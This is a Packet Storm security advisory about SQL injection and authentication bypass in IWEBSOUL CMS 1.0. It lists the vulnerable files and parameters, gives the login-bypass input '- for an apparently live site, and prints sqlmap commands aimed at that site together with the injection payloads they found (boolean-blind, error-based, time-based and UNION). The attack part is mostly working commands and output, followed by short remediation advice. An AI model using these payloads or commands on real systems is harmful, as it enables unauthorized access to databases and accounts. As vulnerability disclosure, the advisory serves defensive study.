exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

IWEBSOUL CMS 1.0 SQL Injection

IWEBSOUL CMS 1.0 SQL Injection
Posted Sep 7, 2017
Authored by Renzi

IWEBSOUL CMS version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

tags | exploit, remote, sql injection
SHA-256 | 279f6a68f97865d9b1e02a9e64e3562399f5ad05334f727efe3b28c967e80167

IWEBSOUL CMS 1.0 SQL Injection

Change Mirror Download
Title:
=======

IWEBSOUL CMS - Multiple SQL Injection Vulnerabilities & Authentication Bypass

Introduction:
==============

Intrepid Websoul Private Limited - iWebsoul is a rapidly growing IT Solution provider in India.
Team comprehensively works to create a unique business and industry based solution for their customers.
They customize solutions and tailor it according to the needs of our clients keeping in mind their vision and target audience.[iWbeSoul]

Vulnerability Disclosure:
==========================

2017-09-06: Public Disclosure

Affected Product(s):
=====================

IWEBSOUL CMS 1.0

Exploitation Technique:
========================

Remote

Severity Level:
================

High

Technical Details & Description:
=================================

An auth bypass session vulnerability has been discovered in the IWEBSOUL CMS 1.0 web-application.
The session vulnerability allows remote attackers to unauthorized access the web user interface.
The vulnerability is located in the session credentials request of the login.php file. Remote attackers are able to use a '- SQL Injection payload to bypass the login.php script validation.
This is results in unauthorized access. The issue is a classic auth bypass and is remote exploitable. The request method to inject is POST.

Request Method(s):

[+] POST

Vulnerable Funcitons(s):

[+] login.php

Affected Module(s):

[+] Web User Interface


A remote SQL Injection web vulnerability has been discovered in the IWEBSOUL CMS 1.0 web-application.
The vulnerability allows remote attackers to execute own sql commands to compromise the web-server or dbms.
The vulnerability is located in the `type` parameter of the `service-detail.php` file GET method request.


Request Method(s):

[+] GET

Vulnerable Function(s):

[+] service-detail.php

Vulnerable Parameter(s):

[+] type

And the other SQL injection is located in the `catid`, 'scatid' & 'typeid' parameters of the `product.php` file GET method request.

Request Method(s):

[+] GET

Vulnerable Function(s):

[+] product.php

Vulnerable Parameter(s):

[+] catid

[+] scatid

[+] typeid

More SQL Injection is located in the 'id' paramater of the 'offerproductdisplay.php' file GET method request.

Request Method(s):

[+] GET

Vulnerable Function(s):

[+] offerproductdisplay.php

Vulnerable Parameter(s):

[+] id

Proof of Concept (PoC):
========================

An Auth bypass vulnerability can be exploited by remote attackers without privilege application user account or user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability.

1 . Open the vulnerable web-app
2 . Start to browse the website and go to http://www.bumalow.com/login.php
3 . Enter Username:'-
4 . Enter Password:'-
5 . Now you will login with the credentials
6 . Successful reproduce of the auth bypass login vulnerability!


The remote sql-injection vulnerability can be exploited by remote attackers with privilege web-application user account and without user interaction.
The security demonstration reproduce the web vulnerability exploitation using SQLmap.


renzi@instance-1:~/sqlmapproject-sqlmap-96b9950$ python sqlmap.py -u "http://www.bumalow.com/service-detail.php?type=1" --current-db --random-agent --dbms=mysql --threads=8

---
Parameter: type (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: type=-7101' OR 4159=4159#

Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: type=1' OR (SELECT 2319 FROM(SELECT COUNT(*),CONCAT(0x716b707071,(SELECT (ELT(2319=2319,1))),0x716b717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- HVPB

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: type=1' OR SLEEP(5)-- dKVd
---


renzi@instance-1:~/sqlmapproject-sqlmap-96b9950$ python sqlmap.py -u "http://www.bumalow.com/product.php?catid=1" --current-db --random-agent --dbms=mysql --threads=8

---
Parameter: catid (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: catid=1 AND SLEEP(5)

Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: catid=1 UNION ALL SELECT CONCAT(0x71786a6271,0x68686e537353764743507264565a7a6673496f70454f7475655846614e5243664f68634a57414761,0x7176787671),NULL,NULL,NULL-- jApP
---


renzi@instance-1:~/sqlmapproject-sqlmap-96b9950$ python sqlmap.py -u "http://www.bumalow.com//offerproductdisplay.php?id=1" --current-db --random-agent --dbms=mysql --threads=8

---
Parameter: id (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1 AND SLEEP(5)
---
Solution
=========

In order to avoid SQL Injection it is important to validate all non-SQL text entries, not allowing special characters and SQL key words to be written, such as INSERT, DELETE, UPDATE, HAVING, JOIN, etc.
It is interesting to set a maximum of characters for passwords and users.
Treat errors appropriately, for messages that do not expose attackers to information about a data structure.

Credits
========

Felipe "Renzi" Gabriel

Contact
========

renzi@linuxmail.org

References
==========

https://www.owasp.org/index.php/Top_10_2013-A1-Injection
https://www.iwebsoul.com/about-iwebsoul.php
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close